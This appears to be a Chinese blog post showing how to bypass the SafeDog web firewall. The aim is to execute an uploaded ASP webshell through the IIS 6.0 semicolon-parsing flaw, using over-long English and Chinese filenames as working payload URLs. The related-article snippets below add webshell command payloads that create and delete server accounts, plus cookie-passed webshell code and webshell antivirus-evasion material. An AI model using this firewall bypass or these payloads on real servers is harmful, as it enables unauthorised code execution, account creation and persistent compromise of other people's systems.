安全狗IIS6.0解析webshell访问限制bypass

最新推荐文章于 2023-11-09 08:33:28 发布
最新推荐文章于 2023-11-09 08:33:28 发布
阅读量1.7k 收藏
点赞数
分类专栏: 笔记 文章标签: bypass web

在访问诸如:a.asp;.jpg/;a.asp;a.jpg/a.asp;a.jpgIIS6.0解析shell的时候会被网站安全狗拦截,可以用一些猥琐的方法绕过其限制来执行上传的webshell

安全狗功能

1、上传a.asp;.jpg/;a.asp;a.jpg/a.asp;a.jpg等不会被拦截。

2、访问a.asp;.jpg/;a.asp;a.jpg/a.asp;a.jpg等会被拦截。

3、上传.asp/.asa/.cer/.cdx等文件会被拦截,如图2和图3

图2

图3

所以呢,直接上传webshell是不可能了,只能通过上传IIS解析shell来突破了。那么,就从文件名入手吧。

Windows 路径+文件夹名+文件名,不能超过260



那就把文件名增加到极限试试:

D:\web\pic.asp;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg

访问:

http://localhost/pic.asp;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg

依然被拦截,如图4

图  4

英文文件名无法突破,那来试一试中文吧。

D:\Web\屯屯.asp;.jpg

访问:

http://localhost/屯屯.asp;.jpg

还是被拦截,如图5

图  5

把中文文件名增加到一定长度试试:

http://localhost/pic.asp;屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯.jpg

如图6,实际测试当长度超过260(中文算长度2)时,安全狗便失去了截断防御功能(中文放在前后都是可以的)。中文长度当然不能无限大,因为IIS要求的URL长度是有限制的,超过便会报错。


只做技术交流 请勿他用 网络安全为双刃剑 务必记住!!

ccstuck
关注
专栏目录
安全攻防基础以及各种漏洞库
weixin_54626591的博客
08-31 1226
安全攻防基础以及各种漏洞库
安全攻防基础
桀骜不逊
03-02 6053
信息搜集 企业信息搜集 企业架构 天眼查 企查查 启信宝 网站友情链接、网站地图 收集子公司、分公司、参股公司等 http://www.chinatelecom.com.cn/corp/zzjgcs/ https://www.qcc.com https://www.tianyancha.com ICP备案查询,确定目标子域名 http://icp.bugscaner.com/ http://icp.chinaz.com/ http://www.gsxt.gov.cn/corp-query-homep
iis 限制动态IP地址访问次数
weixin_30545285的博客
01-05 1183
An IP Address Blocking HttpModule for ASP.NET in 9 minutes namespace YourModuleNameHere 10 { 11 public class IPBlackList : IHttpModule 12 { 13 private EventHandler o...
实验二:突破安全狗getshell
zonei123的博客
11-18 185
实验二:突破安全狗getshell
加固IISWebshell无用武之地
lionzl的专栏
12-07 1217
<br />程序网络工作组ASP站点管理员(ASPAdmin) V1.02 下载<br />用微软 的IIS 打造一个WEB服务器 是件非常简单的事情,但是它的安全性实在不敢恭维。攻击者通过注入、上传、旁注等技术获得了某个网站的webshell ,然后进一步渗透提权,直至控制整个服务器 。至于如何让攻击者无缘webshell 那是代码部分的问题,我们做为管理员应该如何加固Web服务器 ,让攻击者在获得了webshell 之后无功而返呢? <br />一、设置命令权限<br />  默认设置
SQL注入过安全狗直接getshell
qq_42042353的博客
09-26 441
实验环境 1、phpstudy搭建的SQLi-Labs(MySQL) 2、安全狗4.0 成功所需要的条件 1、准备一个可以过狗过杀软的一句话 2、网站目录的绝对路径 直接进入正题 普通的注入攻击直接被安全狗拦截 比方说我们获取到的网站绝对路径为“C:/phpStudy4IIS/WWW/” (这里获取网站绝对路径有很多方式,不一一说明) 这里用到的注入用的是MySQL的数据导入功能“LINES TERMINATED BY” 它的功能就是将我们构造好的字符串直接导入在具体的文件里。很多waf并没有对MySQL
旁注虚拟主机IIS权限重分配跨目录得webshell
kendyhj9999的专栏
03-09 1104
旁注虚拟主机IIS权限重分配跨目录得webshell http://www.2cto.com/Article/201303/197693.html 2013-03-25 10:44:27     我来说两句    来源:Silic Network Solutions   作者:YoCo Smart 收藏    我要投稿 国内的IDC运营商最常见的模式就是IIS
红队系列-网络安全知识锦囊(持续更新)
最新发布
aming小老弟
11-09 989
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
20年时候收集的一些信息安全岗面试题
课嗨教育的专栏
05-02 7677
目录 面试一 面试二 面试三 更多资料可:渗透测试基础课-课程进度_课嗨教育的博客-CSDN博客 面试一 个人介绍: 自我介绍要点:不要用长逻辑句,短小精悍 控制在3-4分钟 1、自我介绍姓名年龄哪里人学校情况不是重点,作为顺滑开场 2、经历与技能啥时候开始学web攻防,实习经历(神舟,做了什么;尚然,做了什么),让人家清楚历史引入技术主题,挑重点 3、业绩/成绩: 研究类:freebuff SRC I春秋...
网络安全渗透
李子木的博客
04-04 8585
Sqlmap简介 sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 Sqlmap安装 (1)安装sqlmap前,需要.
IIS写权限拿WEBSHELL全套
12-28
IIS写权限拿WEBSHELL全套
web渗透中bypass防护系统
Shanfenglan's blog
01-25 3186
文章目录1. webshell执行命令2. sql注入2.1 安全狗mssqlmysql2.2 云盾mysql2.3 云锁mysqlfastjsonsafeline参考文章 1. webshell执行命令 文件上传后向webshell传参数: 三重url编码 三重base64编码 cookie传参 参数污染 http://test/xx.jsp?a=xxx很多的垃圾字符xxx&cmd=whoami cookie传参对应webshell: x=ls <?php $p=$_COOKI
web攻防漏洞之Bypass安全狗绕过
s11show_163的博客
02-28 1163
目的:攻击者在被害者网站上挂载一个自己的木马文件1.php,然后通过在攻击者电脑上访问该挂载文件来实现对被害者网站或者被害者电脑进行侵害。 攻击者希望执行: 创建服务器用户: key=echo('<pre>');system('net user a a /add'); 删除服务器用户: key=echo('<pre>');system('net user a /del')...
网络安全笔记-WebShell与文件上传
L120305q的博客
08-17 2900
网络安全笔记-WebShell与文件上传
asp-Webshell免杀
weixin_44110913的博客
08-23 3388
随着时间的推移和其它新型动态网页技术的兴起,使用ASP(Active Server Page)技术构建的Web应用越来越少。ASP的衰落、旧资料和链接的失效、前辈们早期对ASP较多的研究,都导致了新型ASP网站后门和技术研究的减少。 本篇文章主要梳理ASP一句话Webshell的构建和规避检测软件达到源文件免杀的思路。最终构建能够同时绕过以下表格中8个专业木马查杀工具和平台检测的Webshell,构造出零提示、无警告、无法被检测到的ASP一句话木马后门。 编号 名称 参考链接 1 网站安全狗(.
iis6.0渗透php,利用IIS6.0解析漏洞拿webshell
weixin_32312889的博客
03-18 500
IIS 6.0解析利用方法有两种1.目录解析/xx.asp/xx.jpg2.文件解析wooyun.asp;.jpg第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。例如创建目录 wooyun.asp,那么/wooyun.asp/1.jpg将被当作asp文件来执行。假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图...
免杀WebShell在线生成
weixin_33724046的博客
07-03 617
简直太完美了,ASP和PHP都有http://www.zjjv.com/ 转载于:https://blog.51cto.com/duallay/1670615
墨者学院 - WebShell文件上传漏洞分析溯源(第5题)
多崎巡礼的博客
08-14 1729
弱口令 admin admin 进入后台 添加文章-上传asp一句话木马的图片马,记住返回的路径 当前数据库路径更改为上传一句话木马后返回的路径 备份数据库名称填写后缀为asp的文件名 菜刀链接即可   不能理解为什么数据库名是路径到文件,按理说应该是一个只到文件夹的路径才对。。。 言而总之,就是备份数据可以将文件重命名          ...
安全狗阻止iis运行php,安全狗禁止执行iis命令绕过 | CN-SEC 中文网
weixin_31559919的博客
03-12 366
摘要简要描述: 安全狗禁止执行iis命令绕过 系统是win2003 iis6.04:自己创建了一个aspx的页面代码如下:安全狗禁止执行iis命令绕过简要描述:安全狗禁止执行iis命令绕过详细说明:1:= =1):2):浏览防护,直接访问aspx马,查杀3):静态扫描4):马传上去之后还有一句话连接的防护,就是常见的灭菜刀5):还有恶意组件禁止执行6):禁止iis的命令执行...
Python安全问题与Webshell风险:模块竞争与配置漏洞解析
在阅读这份文档时,读者可以了解到如何避免Python配置中的安全隐患,比如限制对Python解释器的访问,强化目录权限设置,以及提升对模块加载顺序的管理和理解。 "Python_Hack.pdf"是一份实用的指南,旨在帮助开发者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值